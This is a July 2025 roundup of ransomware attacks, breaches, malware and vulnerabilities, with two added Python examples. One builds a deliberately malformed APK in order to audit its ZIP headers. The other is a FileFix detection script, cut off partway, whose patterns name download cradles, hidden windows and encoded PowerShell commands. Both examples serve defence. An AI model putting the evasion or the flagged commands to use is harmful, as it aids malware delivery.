July 2025: Biggest Cyber Attacks, Ransomware Attacks and Data Breaches
Date: 1 August 2025

July 2025 was anything but quiet on the cyber front. From luxury fashion house Louis Vuitton to the U.S. National Nuclear Security Administration, attackers cast a wide net this month, a reminder that no industry, company size or global status is off-limits.
What is striking is the diversity of the victims. Dell, Clorox, Ingram Micro, Russia's WineLab and the crypto exchange BigONE all appear below, and the pattern is sobering: if your systems are online, you are on the radar.
Prevention tools remain essential, but the real test of an organisation's resilience comes when its cyber incident response plan meets a live incident. Tailored cyber tabletop exercises are the most practical way to rehearse that moment: they help leadership and technical teams coordinate under pressure, clarify roles, tighten communication with stakeholders, and surface the decision points that separate swift recovery from organisational paralysis.
Taken together, this month's headline incidents show that the breadth and speed of today's attacks demand a higher standard of readiness. In the 2025 threat landscape, preparation is no longer just good practice; it is a baseline requirement for every business, its operational continuity and its bottom line.
- Ransomware Attacks in July 2025
- Data Breaches in July 2025
- Cyber Attacks in July 2025
- New Ransomware/Malware Discovered in July 2025
- Vulnerabilities Discovered & Patches Released in July 2025
- Warnings/Advisories/Reports/Analysis
Ransomware Attacks in July 2025
Date |
Victim |
Summary |
Threat Actor |
Business Impact |
Source Link |
July 01, 2025 |
Welthungerhilfe |
Ransomware gang attacks German charity that feeds starving children |
Rhysida |
Welthungerhilfe, a major German hunger-relief charity, was hit by a ransomware-as-a-service (RaaS) group—identified as the Rhysida gang—which stole and encrypted data, demanding 20 BTC (~$2.1 million) in exchange for the return of donor and organisational information. The charity refused to pay and immediately shut down affected systems while investigators responded. |
Source: German Hunger Relief Charity Hit by Rhysida Ransomware Gang |
July 02, 2025 |
IdeaLab |
IdeaLab confirms data stolen in ransomware attack last year |
Hunters International ransomware |
IdeaLab confirmed that its systems were breached in October 2024 by the Hunters International ransomware group, which stole sensitive data—names and other personal information—affecting current and former employees, contractors, and their dependents. |
|
July 03, 2025 |
Ingram Micro |
Ingram Micro suffers global outage as internal systems inaccessible |
SafePay Ransomware |
Ingram Micro suffered a global outage in early July after the SafePay ransomware gang infiltrated its internal systems, reportedly through the company's GlobalProtect VPN platform, disrupting website access, order processing and internal operations. |
Source: Bleeping Computer |
July 11, 2025 |
Albemarle County (VA) |
Albemarle latest Virginia county hit with ransomware |
INC Ransomware Group |
Albemarle County (VA) was hit by a ransomware attack that began on the evening of June 10, 2025 and was disclosed in July. The attack disrupted internet services and likely exposed sensitive data of county employees, school staff and possibly residents, including names, addresses, Social Security numbers and driver's license, passport and military ID numbers, prompting involvement from the FBI, CISA and local authorities. The attack has been attributed to the INC Ransom group (aka INC_RANSOM), a Russian-linked extortion operation. No ransom was paid, and affected individuals were offered a year of free identity monitoring through Kroll. |
Source: The Record Media |
July 18, 2025 |
WineLab |
Russian alcohol retailer WineLab closes stores after ransomware attack |
Akira ransomware |
Russian alcohol retailer WineLab was forced to shut down its retail operations and online services following a ransomware attack, reportedly carried out by the Akira ransomware gang, which severely disrupted the company’s IT infrastructure and customer services. |
Source: Bleeping Computer |
July 31, 2025 |
Dollar Tree |
Dollar Tree denies ransomware claims, says stolen data is from defunct discount chain |
INC Ransom (claimed); the source also cites a suspected Snowflake-related threat actor |
INC Ransom listed Dollar Tree on its dark-web leak site, claiming to have taken 1.2 TB of sensitive data. Dollar Tree responded that the material appears to come from the legacy systems of 99 Cents Only Stores, a defunct discount chain, rather than from its own network. The source also recalls an earlier breach at Dollar Tree's service provider Zeroed-In Technologies, which exposed names, Social Security numbers and financial data of nearly 2 million individuals and which it links to a suspected Snowflake-related threat actor. |
Source: The Record Media |
Data Breaches in July 2025
Date |
Victim |
Summary |
Threat Actor |
Business Impact |
Source Link |
July 01, 2025 |
Kelly Benefits |
Kelly Benefits says 2024 data breach impacted 550,000 customers |
Unknown |
Maryland-based Kelly Benefits confirmed that a data breach between December 12–17, 2024, compromised personal information from its IT systems, ultimately impacting 553,660 individuals as reported to U.S. authorities. |
Source: Bleeping Computer |
July 01 and 10, 2025 |
Qantas |
Qantas discloses cyber attack amid Scattered Spider aviation breaches |
Scattered Spider |
Qantas disclosed a major cyberattack that exposed personal details—names, email addresses, phone numbers, birthdates, and frequent‑flyer numbers—for up to six million customers via a third‑party contact‑centre platform, with investigations pointing toward the Scattered Spider threat group behind the incident. |
|
July 03, 2025 |
Telefónica |
Hacker leaks Telefónica data allegedly stolen in a new breach |
“Rey” (Internet name) associated with the HellCat ransomware group |
A hacker known as “Rey”, associated with the HellCat ransomware group, leaked a sample of 2.6 GB (part of an alleged 106 GB dump) stolen from Telefónica’s internal systems—comprising over 20,000 files of internal communications, logs, invoices, customer and employee data from a May 30 breach—while Telefónica hasn’t officially confirmed whether it’s a new incident or old data. |
Source: Bleeping Computer |
July 08, 2025 |
Bitcoin Depot |
Driver's license numbers, addresses leaked in 2024 bitcoin ATM company breach |
Unknown |
Bitcoin Depot, the operator of over 8,000 cryptocurrency ATMs, suffered a data breach in June 2024 that exposed sensitive personal information—names, addresses, driver’s license numbers, phone numbers, emails, and birthdates—of approximately 26,700 users, with no publicly identified threat actor involved and victims not offered identity protection due to regulatory gaps. |
Source: The Record Media |
July 16, 2025 |
Louis Vuitton |
Louis Vuitton says regional data breaches tied to same cyber attack |
ShinyHunters |
Luxury brand Louis Vuitton confirmed that customer data breaches in the UK, South Korea, Turkey, Italy, and Sweden stem from a single cyber attack—believed to be linked to the ShinyHunters extortion group—resulting in unauthorised access to personal information like names, contact details, passport numbers, addresses, and shopping history, though no payment data was compromised. |
Source: Bleeping Computer |
July 16, 2025 |
Co-op UK |
Co-op confirms data of 6.5 million members stolen in cyber attack |
Scattered Spider |
Co-op UK confirmed that a third-party cyber attack targeting its loyalty programme provider, Azpiral, resulted in the unauthorised access and theft of personal data—including names, email addresses, phone numbers, and loyalty card details—of approximately 6.5 million members. |
Source: Bleeping Computer |
July 17, 2025 |
U.S. National Guard |
Chinese hackers breached the National Guard to steal network configurations |
Chinese state-backed hackers (allegedly) |
Chinese state-backed hackers, identified in a DHS memo as the Salt Typhoon group, reportedly breached a U.S. state's Army National Guard network and stole network configuration files and administrator credentials. The stolen configurations could expose infrastructure details useful for follow-on intrusions into other state networks, although no classified data was reported accessed. |
Source: Bleeping Computer |
July 20, 2025 |
Dell |
Dell confirms breach of test lab platform by World Leaks extortion group |
World Leaks extortion group |
Dell confirmed that the World Leaks extortion group breached its Customer Solution Center test-lab platform, an environment isolated from customer and partner systems. Dell said the data obtained was primarily synthetic, publicly available or test data; the source reports that limited information such as names, addresses and hardware details was accessed, with no financial or otherwise sensitive data exposed. |
Source: Bleeping Computer |
July 22, 2025 |
Affidea |
Major European healthcare network discloses security breach |
Unknown |
A major European healthcare network, Affidea, disclosed a cyber attack that disrupted its clinical operations in multiple countries, with systems taken offline as a precaution, though the identity of the threat actor remains unknown. |
Source: Bleeping Computer |
July 23, 2025 |
Toptal’s GitHub account |
Hackers breach Toptal GitHub account, publish malicious npm packages |
Unknown |
Hackers breached Toptal's GitHub organisation and used it to publish malicious versions of the company's npm packages. The packages carried install-time scripts that exfiltrated developers' GitHub authentication tokens and attempted to wipe the host system; the identity of the threat actors remains unknown. |
Source: Bleeping Computer |
July 24, 2025 |
Indian Council of Agricultural Research (ICAR) |
Data breach at ICAR hits key recruitment, agri research projects |
Unknown |
A cyber attack on the Indian Council of Agricultural Research (ICAR) led to a major data breach that disrupted key recruitment processes and agricultural research projects across multiple institutes, though the identity of the threat actor remains unknown. |
|
July 26, 2025 |
The Tea dating safety app |
Hackers leak 13,000 user photos and IDs from the Tea app, designed as a women's safe space |
Unknown |
Hackers gained access to an unsecured Firebase cloud storage bucket used by the Tea dating safety app and downloaded roughly 72,000 images, including about 13,000 selfies and photo IDs submitted for identity verification and 59,000 images from posts and messages. The files were posted to forums such as 4chan, exposing users of an app marketed as a women's safe space to doxxing, blackmail and lasting emotional distress. |
|
July 26, 2025 |
Allianz Life Insurance |
Allianz Life confirms data breach impacts majority of 1.4 million customers |
Unknown at disclosure |
Allianz Life Insurance confirmed that on July 16 an attacker used social engineering to gain access to a third-party, cloud-based CRM system used by the company and stole personal information on the majority of its 1.4 million customers, along with data on financial professionals and some employees; Allianz Life said its own network and other systems were not accessed. |
|
July 27, 2025 |
Naval Group |
France's warship builder Naval Group investigates 1 TB data breach |
Unknown |
French warship builder Naval Group launched an investigation after a hacker allegedly leaked 1 TB of internal data—including documents on submarines, warships, and supplier information—though the identity of the threat actor remains unconfirmed. |
Source: Bleeping Computer |
July 28, 2025 |
Orange Telecom |
French telecom giant Orange discloses cyber attack |
Unknown |
French telecommunications giant Orange disclosed that it detected an attack on one of its information systems on July 25 and isolated the affected system, causing disruption to some management platforms and services for business customers and some consumer services in France. No theft of customer data had been confirmed at the time of disclosure, and the threat actor has not been publicly identified. |
Source: Bleeping Computer |
Cyber Attacks in July 2025
Date |
Victim |
Summary |
Threat Actor |
Business Impact |
Source Link |
July 01, 2025 |
The International Criminal Court |
International Criminal Court hit by new 'sophisticated' cyber attack |
Unknown |
The International Criminal Court in The Hague was struck by a sophisticated and targeted cyber attack that disrupted its systems—though no data loss has been confirmed and no threat actor has been publicly identified. |
Source: Bleeping Computer |
July 06, 2025 |
Shellter Elite |
Hackers abuse leaked Shellter red team tool to deploy infostealers |
An unknown Russian speaking group |
Hackers exploited a leaked copy of the Shellter Elite red-team tool between April and July 2025 to deploy infostealer malware against unsuspecting victims, with activity traced to Russian-speaking cyber criminal groups using a single license leak. |
Source: Bleeping Computer |
July 09, 2025 |
GMX, a decentralized exchange |
More than $40 million stolen from GMX crypto platform |
Unknown |
GMX suffered a major exploit of its V1 protocol, losing around $40–43 million in FRAX, USDC, WBTC and ETH through a re-entrancy flaw that allowed manipulation of the GLP token price. The attacker later began returning most of the funds in exchange for a 10% white-hat bounty; the attacker's identity remains unknown. |
Source: The Record Media |
July 17, 2025 |
BigONE cryptocurrency exchange |
Hacker steals $27 million in BigONE exchange crypto breach |
Unknown |
The BigONE cryptocurrency exchange lost about $27 million in digital assets after what it described as a third-party supply chain attack on its hot wallet infrastructure. The exchange halted withdrawals while it investigated; the attacker's identity remains undisclosed. |
Source: Bleeping Computer |
July 18, 2025 |
Singapore government |
Critical infrastructure in S’pore under attack by cyber espionage group: Shanmugam |
State sponsored APT |
Singapore's Minister K. Shanmugam stated that a state-sponsored Advanced Persistent Threat (APT) group, which he identified as UNC3886, was attacking the nation's critical infrastructure, including sectors such as telecommunications, energy and government, with espionage activity that posed significant national security risks. |
|
July 22, 2025 |
U.S. Nuclear Weapons Agency |
US nuclear weapons agency hacked in Microsoft SharePoint attacks |
Chinese state-sponsored hackers |
The U.S. National Nuclear Security Administration (NNSA), the Department of Energy agency responsible for the nuclear weapons stockpile, was among the organisations compromised through the ToolShell exploit chain (CVE-2025-53770) against on-premises Microsoft SharePoint servers. Chinese state-sponsored hackers are suspected; DOE said the impact was minimal and that no sensitive or classified information was known to have been compromised. |
Source: Bleeping Computer |
July 24, 2025 |
Steam (game) |
Hacker sneaks infostealer malware into early access Steam game |
Unknown |
A threat actor covertly embedded infostealer malware in the early access Steam game Chemia, infecting players' systems and stealing browser credentials and cryptocurrency wallet data. The game's developer was unaware of the compromise, and the title was pulled once the infection was reported. |
Source: Bleeping Computer |
July 28, 2025 |
Lovense |
Lovense sex toy app flaw leaks private user email addresses |
Unknown |
A vulnerability in the Lovense sex toy app exposed private email addresses of users through an insecure API, potentially compromising customer privacy, though no specific threat actor has been attributed to the flaw. |
Source: Bleeping Computer |
July 29, 2025 |
Russian airline Aeroflot |
Russian airline Aeroflot grounds dozens of flights after cyber attack |
Unknown |
Russian airline Aeroflot suffered a cyber attack that took down its IT systems, including online check-in and its mobile app, forcing the cancellation and delay of dozens of domestic and international flights. The pro-Ukrainian group Silent Crow and the Belarusian Cyber Partisans claimed responsibility, saying they had been inside the airline's network for about a year and had destroyed thousands of servers; the claims have not been independently confirmed. |
Source: Bleeping Computer |
July 29, 2025 |
St. Paul Public Schools in the city of St Paul |
Minnesota activates National Guard after St. Paul cyber attack |
Unknown |
Minnesota activated its National Guard cyber unit after a significant cyber attack on St. Paul Public Schools disrupted critical IT systems, prompting concerns of a potential ransomware incident, though the exact impact and threat actor remain under investigation. |
Source: Bleeping Computer |
July 30, 2025 |
Russian pharmacy chain, Rigla |
Cyber attack shuts down hundreds of Russian pharmacies, disrupts healthcare services |
Unknown |
A cyber attack severely disrupted operations at Russia’s largest pharmacy chain, Rigla, forcing it to shut down over 3,000 pharmacies, with speculation pointing to pro-Ukrainian hackers as the likely perpetrators behind the incident. |
Source: The Record Media |
New Ransomware/Malware Discovered in July 2025
New Ransomware/Malware |
Summary |
NimDoor malware |
North Korean state-backed hackers have been using a new family of macOS malware called NimDoor in a campaign that targets web3 and cryptocurrency organisations. |
Batavia spyware |
A previously undocumented spyware called ‘Batavia’ has been targeting large industrial enterprises in Russia in a phishing email campaign that uses contract-related lures. |
AMOS malware |
Malware analysts discovered a new version of the Atomic macOS info-stealer (also known as 'AMOS') that adds a backdoor component, giving attackers persistent access to compromised systems rather than a one-off data grab. |
Anatsa malware |
The Android banking trojan Anatsa resurfaced on Google Play in July 2025—hidden inside a fake PDF viewer with over 50,000 downloads—enabling overlay phishing, keylogging, and automated transactions targeting North American bank apps. |
TapTrap (attack/malware) |
Researchers have uncovered TapTrap, an Android tapjacking exploit that tricks users into tapping hidden permission dialogs—thanks to invisible animations—allowing zero-permission apps to sneakily gain access or even wipe devices. |
Interlock RAT via FileFix technique |
The Interlock ransomware group now uses a novel “FileFix” social-engineering trick—prompting victims to paste disguised PowerShell commands into File Explorer’s address bar—to stealthily install a PHP-based remote access trojan (RAT) and pave the way for ransomware deployment. |
An undisclosed new variant of the Konfety malware |
Threat analysts have identified a new variant of the Konfety Android malware that ships as an intentionally malformed APK: the ZIP general-purpose flag is set to claim that entries are encrypted, and an unsupported compression method is declared for key files such as the manifest, so static analysis tools and security scanners fail to parse the package while Android still installs it. The app poses as a legitimate utility and delivers ad fraud, redirects and data exfiltration. |
LameHug malware |
The newly discovered LameHug malware uses large language models (LLMs) to dynamically generate malicious Windows commands in real time for data theft and system reconnaissance. |
Coyote malware |
The Coyote banking trojan became the first malware observed abusing Microsoft's UI Automation (UIA) accessibility framework in the wild, using this trusted system component to identify banking and cryptocurrency exchange sites open in the browser and harvest credentials while evading detection. |
Koske malware |
A new Linux malware strain named Koske hides its payloads inside seemingly harmless panda JPEG images, using polyglot image files that carry shell and C code alongside the picture so that the payload can be executed directly in memory. It then deploys a userland rootkit and CPU and GPU cryptominers on the compromised host. |
Sources for the above table: Bleeping Computer and Recorded Future News
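The Konfety entry above describes malformed APKs whose ZIP metadata has been doctored so that analysis tooling chokes on them. The script below is an added example (it is not code from the original page or from the researchers cited there) showing the checks an analyst can run before handing a package to a decompiler: it builds a stand-in APK in memory, rewrites the central directory entry for AndroidManifest.xml to declare BZIP2 and the encryption flag, then audits every entry for an unexpected compression method, a set encryption bit, and disagreement between the local header and the central directory. The sample package, the entry names and the two-check threshold are assumptions of the example, not details from the page.

```python
"""Audit an APK's ZIP headers for the metadata tricks used by Konfety-style samples.

Added example, not code from the original page or from the researchers cited there.
Assumptions: the APK is an ordinary ZIP container, and the checks below (a
compression method other than stored/deflate, a set encryption flag, and a
local-vs-central header mismatch) are enough to surface the tampering. The
sample "APK" is constructed in memory here; it is not a real Konfety file.
"""
import io
import struct
import zipfile

# Fixed offsets inside the two header types we patch/inspect:
# (flags offset, name-length offset, name offset). The method field sits
# two bytes after the flags field in both headers.
HEADERS = {
    b"PK\x03\x04": (6, 26, 30),   # local file header
    b"PK\x01\x02": (8, 28, 46),   # central directory file header
}


def patch_entry(buf: bytearray, sig: bytes, name: str, method: int, flags: int) -> bool:
    """Rewrite flags/method in every header of type `sig` that names `name`.

    A signature scan is good enough for this constructed sample; a real
    parser would walk the central directory instead of searching for magic.
    """
    flags_off, nlen_off, name_off = HEADERS[sig]
    patched = False
    pos = buf.find(sig)
    while pos != -1:
        (nlen,) = struct.unpack_from("<H", buf, pos + nlen_off)
        if buf[pos + name_off:pos + name_off + nlen] == name.encode():
            struct.pack_into("<HH", buf, pos + flags_off, flags, method)
            patched = True
        pos = buf.find(sig, pos + 4)
    return patched


def build_sample_apk(tamper: bool = True) -> bytes:
    """Constructed stand-in for an APK (assumption: two entries are enough).

    With tamper=True the central directory entry for AndroidManifest.xml is
    rewritten to claim BZIP2 (method 12) and encryption (flag bit 0), while the
    local header and the compressed bytes are left exactly as written.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("AndroidManifest.xml", b"<manifest package='lookalike.app'/>")
        zf.writestr("classes.dex", b"dex\n035\x00" + bytes(64))
    data = bytearray(buf.getvalue())
    if tamper and not patch_entry(data, b"PK\x01\x02", "AndroidManifest.xml", method=12, flags=0x1):
        raise ValueError("central directory entry not found")
    return bytes(data)


def audit_apk(data: bytes) -> list:
    """Return (entry name, finding) pairs for suspicious ZIP metadata."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.compress_type not in (zipfile.ZIP_STORED, zipfile.ZIP_DEFLATED):
                findings.append((info.filename, f"unexpected compression method {info.compress_type}"))
            if info.flag_bits & 0x1:
                findings.append((info.filename, "encryption flag set"))
            # The central directory says where the local header lives; the two
            # must agree, and a doctored sample typically alters only one of them.
            sig, lflags, lmethod = struct.unpack_from("<4s2xHH", data, info.header_offset)
            if sig != b"PK\x03\x04":
                findings.append((info.filename, "header offset does not point at a local header"))
            elif (lflags, lmethod) != (info.flag_bits, info.compress_type):
                findings.append((info.filename, "local header disagrees with central directory"))
    return findings


def extractable(data: bytes, name: str) -> bool:
    """True if a stock ZIP reader can inflate the entry as described.

    This is the effect the evasion relies on: tooling that trusts the central
    directory gives up on the doctored entry even though the bytes are intact.
    """
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            zf.read(name)
        return True
    except Exception:  # encrypted-without-password, bad stream, unsupported method
        return False


if __name__ == "__main__":
    sample = build_sample_apk()
    for entry, finding in audit_apk(sample):
        print(f"{entry}: {finding}")
    print("manifest readable:", extractable(sample, "AndroidManifest.xml"))
```

Run stand-alone, the audit reports three findings against AndroidManifest.xml and none against classes.dex, and `extractable` shows that Python's own ZIP reader refuses the manifest while the untouched entry still opens. The header-mismatch check is the one worth keeping in a triage pipeline: it fires regardless of which method or flag value the sample declares, and it is cheap to run on every entry before any decompression is attempted.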
Vulnerabilities Discovered & Patches Released in July 2025
Date |
New Flaws/Fixes |
Summary |
July 02, 2025 |
CVE-2025-6463 |
The Forminator plugin for WordPress is vulnerable to an unauthenticated arbitrary file deletion flaw that could enable full site takeover attacks. |
July 02, 2025 |
CVE-2025-5777, CVE-2025-6543 |
Citrix warns that patching recently disclosed vulnerabilities that can be exploited to bypass authentication and launch denial-of-service attacks may also break login pages on NetScaler ADC and Gateway appliances. |
July 03, 2025 |
CVE‑2025‑5959, CVE‑2025‑6554, CVE‑2025‑6191, CVE‑2025‑6192 |
Grafana has issued a critical security update for its Image Renderer plugin and Synthetic Monitoring Agent to patch four high‑severity Chromium vulnerabilities that could enable sandboxed remote code execution or memory corruption via crafted HTML content. |
July 09, 2025 |
CVE‑2025‑3648 |
A newly disclosed critical vulnerability in ServiceNow—known as “Count(er) Strike” (CVE‑2025‑3648)—allows low‑privileged users to infer and enumerate sensitive data from tables they shouldn’t access by exploiting permissive ACL logic that leaks record counts in the UI and source HTML. |
July 09, 2025 |
CVE‑2025‑44957, CVE‑2025‑44962, CVE‑2025‑44954, CVE‑2025‑44960, CVE‑2025‑44961, CVE‑2025‑44963, CVE‑2025‑44955, CVE‑2025‑6243, CVE‑2025‑44958 |
Multiple critical vulnerabilities in Ruckus Networks’ Virtual SmartZone (vSZ) and Network Director (RND) management platforms remain unpatched, potentially allowing attackers to bypass authentication, gain root access, execute arbitrary commands, and fully compromise enterprise wireless environments. |
July 14, 2025 |
CVE‑2025‑7029, CVE‑2025‑7028, CVE‑2025‑7027, CVE‑2025‑7026 |
A firmware security firm disclosed four high-severity UEFI vulnerabilities affecting Gigabyte motherboards that remain unpatched on many boards, allowing an attacker who already has administrative access to bypass Secure Boot, execute arbitrary code in the privileged System Management Mode, and install persistent bootkit malware invisible to the operating system. |
July 16, 2025 |
CVE‑2025‑6558 |
Google released an urgent Chrome update to patch CVE-2025-6558, a high-severity (CVSS 8.8) zero-day exploited in the wild. The flaw is insufficient validation of untrusted input in the ANGLE GPU layer, which a malicious HTML page can trigger to run code inside the GPU process and escape Chrome's security sandbox. |
July 17, 2025 |
CVE-2025-20337 |
Cisco disclosed a further maximum-severity vulnerability in Identity Services Engine (ISE) and ISE-PIC, CVE-2025-20337, which allows an unauthenticated remote attacker to execute arbitrary code as root, and urged immediate patching alongside the earlier CVE-2025-20281 and CVE-2025-20282 fixes. |
July 18, 2025 |
CVE-2025-48927 |
Attackers are actively scanning for CVE-2025-48927 in TeleMessage SGNL, the archiving clone of the Signal app, where an exposed Spring Boot Actuator heap-dump endpoint can leak plaintext credentials and other sensitive data from server memory. |
July 18, 2025 |
CVE-2025-54309 |
A zero-day in CrushFTP, CVE-2025-54309, was actively exploited to gain unauthenticated administrative access through the web interface on servers that did not have the DMZ proxy feature enabled; CrushFTP urged customers to update immediately and to review for rogue admin accounts. |
July 21, 2025 |
ExpressVPN Windows app (no CVE cited) |
A bug in ExpressVPN's Windows app allowed Remote Desktop Protocol traffic (TCP port 3389) to bypass the VPN tunnel, exposing users' real IP addresses during RDP sessions; the issue was reported through the company's bug bounty programme and fixed in an app update. |
July 22, 2025 |
CVE-2025-20281, CVE-2025-20282, CVE-2025-20337 |
Cisco confirmed that some of the maximum-severity remote code execution (RCE) vulnerabilities in Identity Services Engine (ISE) and ISE-PIC, CVE-2025-20281, CVE-2025-20282 and CVE-2025-20337, were being exploited in attacks, allowing unauthenticated attackers to execute arbitrary commands as root on affected systems. |
July 22, 2025 |
CVE-2025-2775, CVE-2025-2776 |
CISA added two pre-authentication XML external entity (XXE) vulnerabilities in SysAid On-Premise IT service management software, CVE-2025-2775 and CVE-2025-2776, to its Known Exploited Vulnerabilities catalogue after evidence of active exploitation; the flaws can be chained to read sensitive files and compromise the server. |
July 24, 2025 |
Mitel MiVoice MX-ONE (no CVE assigned at disclosure) |
Mitel warned of a critical authentication bypass vulnerability in the Provisioning Manager component of its MiVoice MX-ONE communication platform that could allow unauthenticated attackers to gain administrative access; no CVE identifier had been assigned when the advisory was published. |
July 28, 2025 |
CVE-2023-2533 |
CISA added CVE-2023-2533, a cross-site request forgery flaw in PaperCut NG/MF print management software that can lead to remote code execution when a logged-in administrator is lured to a malicious page, to its Known Exploited Vulnerabilities catalogue and urged organisations to patch immediately. |
July 30, 2025 |
CVE-2025-6558 |
Apple released updates for iOS, iPadOS, macOS and Safari to patch CVE-2025-6558, a flaw in the open-source ANGLE graphics layer that Google had already disclosed as an exploited Chrome zero-day, noting that maliciously crafted web content could trigger it. |
Source for the above table: Bleeping Computer, Recorded Future
Warnings/Advisories/Reports/Analysis
News Type |
Summary |
Report |
The U.S. Treasury Department sanctioned a Russia-based company that had provided technical tools to ransomware gangs and digital drug traffickers. |
Report |
Building automation giant Johnson Controls has started notifying individuals whose data was stolen in a massive ransomware attack that impacted the company's operations worldwide in September 2023. |
Report |
Researchers uncovered a widespread phishing campaign that used thousands of fake retail websites impersonating major brands like Apple and PayPal to steal credit card data from online shoppers. |
Report |
Esse Health alerted over 263,000 patients that their personal and health data had been stolen in an April 21 cyberattack that had disrupted key patient-facing network and phone systems. |
Report |
More than 40 fake Firefox add-ons posing as wallets like Coinbase, MetaMask, and Trust Wallet were uploaded between April and July 2025 to steal users’ private keys and drain their crypto wallets—a campaign traced to a Russian‑speaking threat group |
Report |
Malicious Chrome extensions, posing as legitimate utilities, were found with a total of 1.7 million downloads on the Chrome Web Store and were discovered to have secretly tracked users, stolen browsing data, and redirected them to unsafe sites—malicious behaviour added later via updates—with no specific threat actor publicly named |
Report/Analysis |
A sophisticated social engineering scheme allowed attackers to trick a third‑party into resetting an M&S employee’s password on April 17, 2025, enabling intrusion and deployment of DragonForce ransomware that led to widespread encryption and the theft of around 150 GB in data across the retailer’s network. |
Report |
Cyber criminals have created over 17,000 fraudulent websites masquerading as trusted news outlets like CNN, BBC, and CNBC to promote deceptive cryptocurrency investment schemes and lure victims into fake trading platforms across more than 50 countries. |
Report |
Four individuals in the UK—aged between 17 and 20—were arrested in July 2025 in connection with ransomware attacks that disrupted operations at major retailers Marks & Spencer, Co‑op, and Harrods, in a campaign attributed to the social‑engineering‑focused cyber crime group known as Scattered Spider. |
Report |
A 26-year-old Russian professional basketball player, Daniil Kasatkin, was arrested in France on June 21 at the request of U.S. authorities for allegedly acting as a negotiator for a ransomware gang that targeted nearly 900 U.S. companies and two federal agencies between 2020–2022, though his lawyer insists he lacked technical skill and may have been unknowingly implicated. |
Report |
Former Mexican President Enrique Peña Nieto is under formal investigation after allegations that he received up to $25 million in bribes from Israeli businessmen to secure government contracts, including for the deployment of Pegasus spyware from NSO Group; so far no concrete evidence supports the claims. |
Report |
The UK’s National Cyber Security Centre (NCSC) has launched the Vulnerability Research Initiative (VRI), a formal collaborative program engaging external cybersecurity researchers to bolster the nation's ability to discover, analyse, and address software and hardware vulnerabilities more effectively than internal efforts alone. |
Report |
A former officer of the UK’s National Crime Agency (NCA) was jailed after being convicted of stealing over £150,000 worth of Bitcoin seized during a criminal investigation. |
Report |
Indonesia extradited Russian national Alexander Zverev on July 11, 2025, to face Russian charges after allegedly running a Telegram channel that sold sensitive personal data obtained from law enforcement and telecom databases between 2018 and 2021. |
Report |
Romanian police, supported by over 100 HMRC investigators, arrested 13 individuals in Romania and one in the UK for orchestrating a large-scale phishing fraud against Britain's tax authority, which used stolen personal data to submit fraudulent PAYE, VAT and child benefit claims totalling approximately £47 million. |
Report |
Google has filed a lawsuit to disrupt the BadBox botnet, a massive cyber crime operation that infected over 10 million Android devices globally through malicious firmware, enabling activities like fraud, data theft, and unauthorised account creation. |
Report |
A newly released Phobos ransomware decryptor enables victims of multiple Phobos variants to recover their encrypted files for free, offering a crucial tool for affected users without needing to pay ransom. |
Report |
The UK government linked Russia's GRU military intelligence agency to the "Authentic Antics" cyber campaign, which used custom credential-stealing malware to target politicians, journalists, and public figures in the UK and beyond over several years. |
Report |
Microsoft linked the Chinese state-sponsored groups Linen Typhoon and Violet Typhoon, along with the China-based Storm-2603, to attacks exploiting the ToolShell vulnerability chain (CVE-2025-53770 and CVE-2025-53771) in on-premises SharePoint servers. The attackers drop a web shell and steal the server's ASP.NET MachineKey material, which lets them forge valid requests and keep executing commands even after the initial flaw is patched, which is why Microsoft advised rotating the keys as well as applying the update. |
Report |
The UK government announced plans to ban public sector bodies and operators of critical national infrastructure from paying ransomware gangs, alongside a payment prevention regime for other organisations and mandatory incident reporting, aiming to cut off the criminals' income and reduce the incentive for attacks. |
Warning |
CISA and the FBI issued a joint alert warning that Interlock ransomware attacks had escalated in frequency and impact, targeting organisations across critical infrastructure sectors and exfiltrating sensitive data before encryption. |
Report |
Hackers had impersonated Clorox staff to deceive Cognizant’s IT help desk and reset multifactor authentication, leading to a 2023 ransomware attack that Clorox claimed caused $380 million in losses, as revealed in a lawsuit. |
Report |
Dior began notifying U.S. customers of a data breach that exposed sensitive personal information, including names, email addresses, phone numbers, birthdates, and encrypted passwords, due to unauthorised access to its systems. |
Sources: Bleeping Computer, Recorded Future News, BloombergLaw, Databreaches.net
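The Interlock entries above (the FileFix technique in the malware table and the CISA/FBI alert) describe a lure in which the victim pastes a disguised PowerShell command into File Explorer's address bar. On the endpoint that shows up as explorer.exe spawning a script host with a command line padded by spaces and ending in a fake "# C:\..." path comment. The detection below is an added example, not code from the original page or from any vendor cited there: it assumes Sysmon-style process-creation events serialised as one JSON object per line with Image, ParentImage, CommandLine and ProcessId fields (an assumption of the example), runs a small set of command-line indicators over constructed sample lines, and deliberately ignores script hosts that were not launched from explorer.exe.

```python
"""Flag FileFix/ClickFix-style script launches in process-creation telemetry.

Added example, not code from the original page or from any vendor cited there.
Assumes Sysmon-style process-creation events, one JSON object per line, with
the fields Image, ParentImage, CommandLine and ProcessId (an assumption of the
example). The sample log lines at the bottom are constructed, not real captures.
"""
import json
import re

# Script hosts a user can be tricked into running via the Run dialog (ClickFix)
# or the File Explorer address bar (FileFix); explorer.exe is the parent in both.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}
LURE_PARENTS = {"explorer.exe"}

# Each indicator is a reason on its own. The last one is the FileFix-specific
# tell: the clipboard payload is padded with spaces and ends in "# C:\..." so
# the address bar shows a path while PowerShell ignores everything after '#'.
INDICATORS = [
    (re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I), "hidden window"),
    (re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"\b(?:iwr|invoke-webrequest|iex|invoke-expression|downloadstring|curl)\b", re.I),
     "download cradle"),
    (re.compile(r"\s{3,}#\s*[A-Za-z]:\\", re.I), "padded path comment"),
]


def basename(path: str) -> str:
    """Return the file name of a Windows path, lower-cased for comparison."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the indicator names that fire for one process-creation event.

    An empty list means not flagged. A script host spawned by explorer.exe on
    its own is normal (a user opening a terminal from the Start menu), so the
    rule also requires at least one command-line indicator.
    """
    if basename(event.get("Image", "")) not in SCRIPT_HOSTS:
        return []
    if basename(event.get("ParentImage", "")) not in LURE_PARENTS:
        return []
    cmdline = event.get("CommandLine", "")
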